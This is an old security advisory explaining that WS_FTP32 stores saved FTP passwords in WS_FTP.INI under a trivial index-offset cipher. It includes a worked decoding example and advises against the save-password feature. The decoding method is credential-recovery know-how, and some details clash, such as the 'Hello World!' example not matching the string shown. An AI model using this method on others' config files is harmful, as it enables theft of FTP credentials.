WS_FTP Password Encryption Defeated!
This document will explain how to defeat WS_FTP32 client side password encryption and a temporary solution to resolve this problem. The ease of defeating of this encryption scheme is very alarming, since majority of Windows users on the Internet use WS_FTP32 as their main ftp client. To defeat the encryption routine only takes a few lines of C code.

I would like to thank Nightshd and Yoshi for bringing up this topic and assisting in defeating it!

No disassemblies or viewing of the source was performed.

If you have questions or concerns about this weakness please contact it's author, John A. Junod or contact him at his alternative site.


Disclaimer

As always Damaged Cybernetics promotes the usage of it's documents for educational purposes only. If you feel you have an issue concerning our information distrubtion, please contact us.


How serious is this?

  • People running a variant of Windows. Windows NT being an exception, for if configured properly it can be secure. However this does NOT fix the problem!
  • Home users, goverment agencies and corporations use this as their main ftp client. Home users are generaly excluded unless you have very nasty friends. Goverment agencies and business are more at risk, since Windows is not a very secure operating system.


Password Details

  • Passwords are a maximum of 78 characters.
  • Passwords can contain letters, numbers and high end ASCII (MS-DOS) characters. Most users only use letters and numbers in their passwords.
  • Password lengths are always divisible by 2.
  • Passwords once encrypted are stored as hex string in an INI file called WS_FTP.INI. It is either located in the Windows home directory or in WS_FTP home directory.

    Example:
    [Test System]
    HOST=0
    UID=MindRape
    PWD=6162636465
    PASVMODE=0

  • Two 1 digit hex values make up one ASCII character. For example this hex string contains '69626A'. It's character makeup is this, (69)(62)(6A), which is 3 characters.
  • The hex string is stored as a C style string. It's index is starting at 0.


Defeating It

The password encryption is fairly simple, it closely resembles a Ceasar Cipher.

For every two 1 digit hex value, concatenate them together to produce 1 hex value. Then take it's index (C Styled) in the string and substract from the hex value. This will produce the correct ASCII value.

Example:
Lets take the password '48666E6F73255D767A756E2C' (from WS_FTP.INI) and try to decrypt it.

First break down the string into it true hex values.
(48)(66)(6E)(6F)(73)(25)(5D)(76)(7A)(75)(6E)(2C)

Since this is a C Style string, it's index starts as 0. Lets decode the password now.

(0x48)-0 = 48 = H
(0x66)-1 = 65 = E
(0x6E)-2 = 6C = L
(0x6F)-3 = 6C = L
...

Eventually it produces the string 'Hello World!'.

Here is some C source code to do it for you.


Work Around

The recommended work around is not to use the Save Password feature of WS_FTP32. This is generally a good idea across all secured applications. For without the password encryption scheme being publicly reviewed and also the implementation of such a scheme, one should NEVER trust any feature such as this.

Damaged Cybernetics is not connected or affiliated with any mentioned company in any way. The opinions of Damaged Cybernetics do not reflect the views of the various companies mentioned here. Companies and all products pertaining to that company are trademarks of that company. Please contact that company for trademark and copyright information.

© 1996 Damaged Cybernetics All Rights Reserved